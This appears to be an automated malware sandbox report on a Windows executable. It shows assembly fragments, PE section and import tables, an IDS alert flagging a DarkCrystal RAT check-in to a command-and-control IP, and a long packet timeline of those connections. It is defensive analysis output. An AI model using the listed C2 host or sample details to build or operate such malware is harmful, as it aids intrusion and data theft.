                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FB4D4DA76ECh
                                                            int3
                                                            jmp 00007FB4D4DA9187h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x640000xdff80xe000False0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x720000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                            PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                            RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                            RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                            RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                            RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                            RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                            RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                            RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                            RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                            RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                            RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                            RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                            RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                            RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                            RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                            RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                            RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                            RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                            RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                            RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                            RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                            RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                            RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                            RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                            RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                            RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                            DLLImport
                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.577.91.124.10149712802048095 11/21/23-04:47:24.543305TCP2048095ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)4971280192.168.2.577.91.124.101
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 21, 2023 04:47:24.170830011 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:24.367815971 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:24.367939949 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:24.543304920 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:24.740047932 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:24.740185022 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:24.741302967 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:24.938016891 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:25.036397934 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:25.036421061 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:25.036478996 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:25.036513090 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.359703064 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.485256910 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.557750940 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.558056116 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.558262110 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.683543921 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.683660030 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.683871984 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.758224010 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.762336969 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.782782078 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.881592035 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.881618023 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.881994009 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:26.982052088 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.982301950 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:26.982625008 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.079488993 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.079508066 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.085913897 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.179675102 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.184570074 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.215053082 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.216219902 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.219638109 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.411823034 CET804971277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.412080050 CET4971280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.412601948 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.412683964 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.412916899 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.416953087 CET804971377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.417025089 CET4971380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.609357119 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.609544992 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.609765053 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.806305885 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.806318998 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.814687014 CET804971477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:27.869221926 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:27.932182074 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.130470991 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.130537033 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.130729914 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.329829931 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.329854012 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.330218077 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.527766943 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.527823925 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.534405947 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.588053942 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.650906086 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.651735067 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.851634979 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.851746082 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.852116108 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:28.852128983 CET804971577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:28.852185965 CET4971580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.049665928 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.050067902 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.050301075 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.251455069 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.251808882 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.257055044 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.306643963 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.382476091 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.382903099 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.580264091 CET804971677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.580368042 CET4971680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.580442905 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.580533981 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.580786943 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.778312922 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.778557062 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.778968096 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:29.976651907 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.976669073 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:29.983077049 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.025494099 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.101665974 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.102051973 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.298654079 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.298784018 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.299001932 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.299313068 CET804971777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.299391985 CET4971780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.495551109 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.495738983 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.495970964 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.692838907 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.692857027 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.699763060 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:30.744158983 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.821105957 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:30.821549892 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.017972946 CET804971877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.018115997 CET4971880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.018867970 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.018958092 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.019237995 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.220550060 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.220777988 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.221050024 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.418498039 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.418519020 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.425097942 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.478527069 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.555133104 CET4971480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.560230017 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.560805082 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.757649899 CET804971977.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.757742882 CET4971980192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.758568048 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.758636951 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.758867979 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:31.958369017 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.958381891 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:31.958623886 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.163883924 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.163897038 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.168170929 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.198146105 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.212902069 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.295423985 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.396799088 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.396950960 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.397201061 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.492626905 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.492827892 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.493082047 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.596533060 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.596981049 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.597275019 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.690073967 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.690172911 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.690422058 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.795871019 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.795886993 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.802401066 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.853647947 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:32.887752056 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.887756109 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.893771887 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:32.947360039 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024019003 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024043083 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024182081 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.024732113 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222235918 CET804972277.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222397089 CET4972280192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222557068 CET804972077.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222608089 CET4972080192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.222876072 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.222959995 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.223157883 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.223634005 CET804972177.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.223684072 CET4972180192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.420738935 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.420999050 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.421247959 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.618938923 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.625627041 CET804972377.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.666075945 CET4972380192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.752722979 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.951730967 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:33.951821089 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:33.952024937 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.148416996 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.148653030 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.148940086 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.351747036 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.351785898 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.355681896 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.400476933 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.479502916 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.480133057 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.676223993 CET804972477.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.676398993 CET4972480192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.677706957 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.677783966 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.678030968 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:34.875463963 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.875669003 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:34.875929117 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.073908091 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.073930025 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.080408096 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.134809971 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.200479031 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.200953007 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.397361994 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.397461891 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.397778988 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.398185015 CET804972577.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.398250103 CET4972580192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.594203949 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.594356060 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.594820023 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.791397095 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.791412115 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.797945976 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:35.853562117 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.915481091 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:35.915920973 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.111917019 CET804972677.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.112020016 CET4972680192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.113404036 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.113504887 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.113682032 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.311201096 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.311444998 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.311707973 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.509531975 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.509562969 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.515629053 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.556971073 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.635565996 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.636056900 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833107948 CET804972777.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.833302021 CET4972780192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833451033 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:36.833529949 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:36.833880901 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.031343937 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.031764984 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.032001972 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.229775906 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.229790926 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.236182928 CET804972877.91.124.101192.168.2.5
                                                            Nov 21, 2023 04:47:37.291038036 CET4972880192.168.2.577.91.124.101
                                                            Nov 21, 2023 04:47:37.352376938 CET4972880192.168.2.577.91.124.101
